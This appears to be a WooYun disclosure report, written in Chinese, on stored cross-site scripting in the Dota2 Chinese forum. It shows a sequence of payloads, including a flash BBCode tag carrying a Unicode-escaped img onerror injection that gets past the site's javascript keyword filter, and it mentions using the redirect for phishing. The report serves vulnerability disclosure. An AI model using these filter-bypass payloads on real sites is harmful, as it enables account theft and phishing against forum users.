WooYun.org

http://bbs.dota2.com.cn/
dota2论坛的，为了礼物写的详细点
首先论坛嘛，各种发帖回帖，那么就来找找发帖处看看。。
各种链接，图片，视频，flash
先来最简单的看看<script>alert(1)</script>
结果以文本形式输出，看来有处理过。
再来发图片看看[img]javascript:alert(1)[/img]

抱歉，您填写的内容包含不良信息而无法提交
看来关键字javascript也被检测过滤了
再来试试视频链接处xx.com">javascript:alert(1)
因为javascript有检测，所以我们对他进行JS转义
xx.com\u0022\u003e\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003a\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029
这下看看

惨！\全被转成了\\
这测了这么久，不能就这么算了吧。。再试试flash看看！
[flash=0,0]http://xx.com"><img src=x onerror=alert(1)><a 1.swf[/flash]

有戏！！原样插进去了！！！
但是没弹框- -！
没关系JS转义看看
[flash=0,0]http://xx.com\u0022\u003e\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0078\u0020\u006f\u006e\u0065\u0072\u0072\u006f\u0072\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e\u003c\u0061 1.swf[/flash]
哎呀激动人心！！弹了！！！！

把框点掉，我以为这就是结束，但是这就结束了吗？！
no！！！
之后chrome浏览器居然自动重定向了！！

居然跳出来了一枚福利。。。我真的是随手一打。。。。。。。
这要是写成钓鱼网站的地址，那不是一钓一堆号！！！
试了下火狐，好像不行。